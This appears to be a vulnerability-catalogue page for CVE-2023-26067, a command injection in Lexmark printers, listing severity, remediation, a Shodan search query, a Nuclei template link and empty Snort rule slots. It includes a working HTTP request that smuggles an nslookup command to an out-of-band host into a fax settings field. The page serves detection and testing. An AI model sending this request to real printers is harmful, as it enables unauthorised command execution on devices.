🔙 목록으로 돌아가기

CVE-2023-26067: Lexmark Printers - Command Injection

TitleLexmark Printers - Command Injection
AuthorDhiyaneshDK
SeverityHigh
ImpactSuccessful exploitation of this vulnerability could lead to unauthorized access, data leakage, and potential compromise of the affected device.
RemediationApply the latest firmware update provided by Lexmark to mitigate the command injection vulnerability.
CVSS Score8.1
EPSS Score0.92175
CVE IDCVE-2023-26067
CWE IDCWE-20
Shodan QueryServer: Lexmark_Web_Serverserver: lexmark_web_server
Tags cve2023 cve printer iot lexmark vkev vuln

🔍 Vulnerability Description

Certain Lexmark devices through 2023-02-19 mishandle Input Validation (issue 1 of 4).

🌐 HTTP Request

POST /cgi-bin/fax_change_faxtrace_settings HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15
Connection: close
Content-Length: 75
Accept-Encoding: gzip, deflate

FT_Custom_lbtrace=$(nslookup d5jkmnple0o3745lu9dgb7rg313z6qt5e.oast.online)

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2023/CVE-2023-26067.yaml

🦈 Packet Capture: ⬇️ Download cve-2023-26067.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A